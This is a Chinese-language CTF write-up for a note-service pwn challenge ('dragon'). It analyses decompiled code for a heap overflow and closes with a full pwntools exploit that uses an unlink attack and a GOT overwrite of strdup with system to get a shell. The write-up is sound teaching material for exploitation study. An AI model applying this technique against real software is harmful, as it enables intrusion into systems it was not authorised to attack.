漏洞类型:堆溢出
利用方法:unlink(具体原理参见)
程序入口,经典note
类型的题目
welcome to my note service
1. add note
2. edit note
3. delete note
4. list note
>>
代码分析
__int64 sub_400A28()
{
v6 = *MK_FP(__FS__, 40LL);
if ( notes_num > 4 )
{
puts("you've got enough notes.");
}
else
{
v4 = (void **)malloc(0x18uLL);
printf("please input note name size: ");
__isoc99_scanf("%ld", &size);
getchar();
if ( (signed __int64)size <= 32 )
{
*v4 = malloc(size);
printf("please input note name: ", &size);
v0 = (unsigned int)size;
readn(*v4, size);
printf("please input note content: ", v0);
readn(&s, 32);
v4[2] = strdup(&s);
for ( i = 0; i <= 4; ++i )
{
if ( !notes[i] )
{
*((_DWORD *)v4 + 2) = i;
notes[i] = (__int64)v4;
break;
}
}
++notes_num;
puts("add note success.");
}
}
return *MK_FP(__FS__, 40LL) ^ v6;
}
这里有两个问题,当输入的size大于32后,函数直接返回,而申请的内存并没有释放掉。另一个问题出在strdup
函数上,strdup
的功能等价于先调用strlen
计算输入字符串的长度,然后调用malloc
申请对应大小的内存,最后再调用strcpy
拷贝字符串,我们再来看一下edit
功能
__int64 sub_400B87()
{
int v1; // [sp+Ch] [bp-14h]@1
__int64 v2; // [sp+10h] [bp-10h]@4
__int64 v3; // [sp+18h] [bp-8h]@1
v3 = *MK_FP(__FS__, 40LL);
printf("input note id: ");
__isoc99_scanf("%d", &v1);
getchar();
if ( v1 >= 0 && v1 <= 4 && notes[v1] )
{
v2 = notes[v1];
printf("please input new note content: ", &v1);
readn(*(void **)(v2 + 16), 32); //这里读入了32个字节的数据
}
else
{
puts("wrong id.");
}
return *MK_FP(__FS__, 40LL) ^ v3;
}
在glibc
内存管理中,最低分配的是16
个字节(64位),也就是说如果新建note
时输入content
的长度小于16
字节,通过edit
我们可以实现最多16
个字节的溢出。不难看出,溢出之后我们就可以泄露堆地址。
当然,通过溢出我们也可以伪造堆,接下来就是通过unlink操作修改指针
修改后地址
0x16af0e0
指向值将会变为0x16af0c8
,这个地址是content
地址,再次调用edit
就可以完全地控制这个值了。后面要做的就是把这个地址修改为strdup
的got
表,然后调用list
功能泄露libc
地址,并再次调用edit
写入system
函数地址,最后调用new
功能get shell
。
完整的exp如下
from pwn import *
def new(p, name_size, name, content):
p.recvuntil(">>")
p.sendline('1')
p.recvuntil('name size:')
p.sendline(str(name_size))
if name_size > 32:
return
p.recvuntil('name:')
p.send(name)
p.recvuntil('content:')
p.send(content)
def edit(p, nid, content):
p.recvuntil(">>")
p.sendline('2')
p.recvuntil('id:')
p.sendline(str(nid))
p.recvuntil('content:')
p.send(content)
def delete(p, nid):
p.recvuntil(">>")
p.sendline('3')
p.recvuntil('id:')
p.sendline(str(nid))
def show(p, nid):
p.recvuntil(">>")
p.sendline('4')
p.recvuntil('id:')
p.sendline(str(nid))
p = process('./dragon')
#step 1. leak heap addr
new(p, 16, 'a'*15+'\n', 'b'*15 + '\n')
new(p, 16, 'c'*15+'\n', 'd'*15 + '\n')
#heap overflow here
edit(p, 0, 'e'*32)
show(p, 0)
p.recvuntil('e'*32)
heap_base = u64(p.recvline()[:-1].ljust(8, '\0')) - 0x90
print 'Got heap_base:', hex(heap_base)
#step 2. clear data
edit(p, 0, 'e'*16 + p64(0) + p64(0x21))
delete(p, 0)
delete(p, 1)
new(p, 50, '', '')
new(p, 50, '', '')
new(p, 50, '', '')
new(p, 50, '', '')
unlink_addr = heap_base + 0xe0
#step 3. make a fake heap
new(p, 32, 'a'*32, 'b'*15 + '\n')
new(p, 32, 'a'*31+'\n', '/bin/sh' + '\n')
new(p, 32, 'a'*31+'\n', 'b'*15 + '\n')
new(p, 32, 'a'*31+'\n', 'b'*15 + '\n')
new(p, 32, p64(0xa0) + p64(0x21) + 'a'*16, 'b'*15 + '\n')
edit(p, 0, p64(0) + p64(0xf1) + p64(unlink_addr - 0x18) + p64(unlink_addr - 0x10))
edit(p, 2, 'a'*16 + p64(0xf0) + p64(0xa0))
#step 4. trigger unlink
delete(p, 3)
#step 5. leak address of strdup
binf = ELF('./dragon')
edit(p, 0, 'a'*8 + p64(heap_base + 0xf0) + 'b'*8 + p64(binf.got['strdup']))
show(p, 0)
p.recvuntil('content:')
free_addr = u64(p.recvline()[1:-1].ljust(8, '\0'))
print 'strdup addr is ', hex(free_addr)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.24.so')
system_addr = free_addr + libc.symbols['system'] - libc.symbols['strdup']
print 'system addr is ', hex(system_addr)
#step 6. rewrite system address into GOT table of strdup
edit(p, 0, p64(system_addr) + '\n')
delete(p, 2)
#gdb.attach(p, open('debug'))
#step 7. get shell
new(p, 16, 'a'*15+'\n', '/bin/sh' + '\n')
p.interactive()